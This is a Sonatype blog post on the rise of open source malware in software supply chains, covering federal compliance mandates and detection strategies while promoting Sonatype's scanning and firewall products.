The value of open source is undeniable — 90% of all modern software development depends on it. According to Harvard Business School, in 2024 alone, more than 6 trillion open source software components were downloaded, representing almost $9 trillion in value to users.
As a result, the security of open source software is a growing concern across the industry, particularly for federal agencies. The sophistication and frequency of cyber threats targeting open source dependencies are increasing, with high-profile attacks like SolarWinds and Log4j, demonstrating the potential impact.
This is putting pressure on developers whose responsibility it is to serve the public trust. In this blog, we discuss why addressing the malware threat in your supply chain is critical, including the risks malware represents, detection and mitigation strategies, and regulatory requirements to boost our cybersecurity posture.
Malware vs. vulnerabilities: Understanding the difference
Malware is designed intentionally to do harm by gaining unauthorized access or otherwise compromising systems. It has been with us for years, spreading through email attachments, malicious websites, or compromised devices. But in conjunction with the rise in the use of OSS components, we've seen the rise of open source malware, which is malware disguised as legitimate components to infiltrate repositories.
In contrast, a vulnerability is a weakness that can be exploited to gain unauthorized access to a system, cause damage, or manipulate it in some way. Vulnerabilities are not intentional but can leave a system vulnerable to attack.
Attackers are evolving from exploiting vulnerabilities to injecting malware directly into open source projects. This represents a particularly dangerous threat because it makes it possible for hackers to compromise OSS repositories and amplify the damage that can be done.
-
Open source malware: A malicious component is created for the purpose of introducing risk into the development process.
-
Vulnerable open source component: A legitimate open source component where an action inadvertently introduces risk.
The growing threat of open source malware
Open source malware is on the rise, partly because OSS repositories present an attractive attack point. Sonatype estimates that as many as half of all unprotected repositories already have cached open source malware. A startling finding from the 2024 State of the Software Supply Chain report was a 156% increase in malicious packages identified from 2023 to 2024. In fact, Sonatype has identified 810,993 pieces of open source malware since we started tracking it in 2019.
Government organizations are under assault in particular, experiencing the highest number of attempted malware attacks last year – more than 300,000 – making up 67.31% of the total malware attacks blocked by Sonatype in 2024.
Some examples of high-profile malware attacks include Tea.yaml, where hackers exploited the "Tea" protocol by flooding npm and PyPI with Potentially Unwanted Applications (PUAs). More recently, the JavaScript library Lottie Player was compromised when attackers released three malicious versions that led to significant financial losses, including one reported phishing incident resulting in more than $723,000 stolen.
Federal mandates and compliance requirements for software supply chain security
To help meet the challenge of malware and the vulnerability of software supply chains, we've seen a flood of federal mandates designed to provide guidance and best practices for federal contractors and software providers.
Regulations like CISA's Secure by Design Initiative emphasize proactive security measures, while OMB Memo M-22-18 mandates secure software development practices for federal agencies. NIST SP 800-218 (SSDF) and Executive Order 14028 further establish guidelines for securing the software lifecycle, compelling organizations to integrate security from the ground up. CISA's SBOM (software bill of materials) requirements and new attestation rules demand greater transparency, ensuring that software vendors disclose dependencies and certify compliance with federal security standards.
Why traditional security measures fall short against malware
Traditional security measures — antivirus software and perimeter defenses — are no longer up to the task. Attackers today are always evolving, looking for an edge using sophisticated malware that evades signature-based detection and bypasses firewalls. Simply scanning for known vulnerabilities isn't enough. Malware can be hidden in open source dependencies or disguised in software updates, providing gaps for hackers to exploit and slip past traditional scans that only flag pre-identified risks.
A proactive approach to software supply chain security is essential.
Continuous monitoring, automated dependency analysis, and behavior-based threat detection help identify and block malicious components before they cause harm. Sonatype's intelligence-driven security solutions go beyond traditional defenses, ensuring developers use only trusted, vetted components — stopping malware at its source rather than reacting after the damage is done.
How to detect and prevent malware in your software supply chain
Prevention is the name of the game for malware prevention, which means detecting suspicious dependencies before they have the opportunity to cause harm. Warning signs include typosquatting, recently published packages with little community adoption and unexpected behaviors in updates.
Software composition analysis (SCA) tools can be an enormous advantage in identifying and mitigating these threats. For example, Sonatype Lifecycle continuously scans dependencies, detecting known vulnerabilities and uncovering hidden risks. The advanced malware detection engine of Sonatype Repository Firewall goes further, proactively blocking both known and unknown threats before they reach your pipeline.
Taking action: Strengthening your software supply chain security
Federal mandates are amping up the pressure on federal organizations to raise the bar for their software supply chain security. Proactive risk mitigation is essential for compliance, including mandating SBOM management, automated dependency management, enforcing approval workflows, and ensuring the integrity of the components entering their development environments.
In addition to being proactive, a security-first culture is important. Organizations that integrate security into their development and deployment processes will be much better prepared to stave off malware threats and remain in compliance. By leveraging automation, trusted sources, and actionable intelligence, enterprises can build resilient software supply chains, minimizing exposure to malware and vulnerabilities.
Learn more about Sonatype's malware detection and federal compliance solutions.
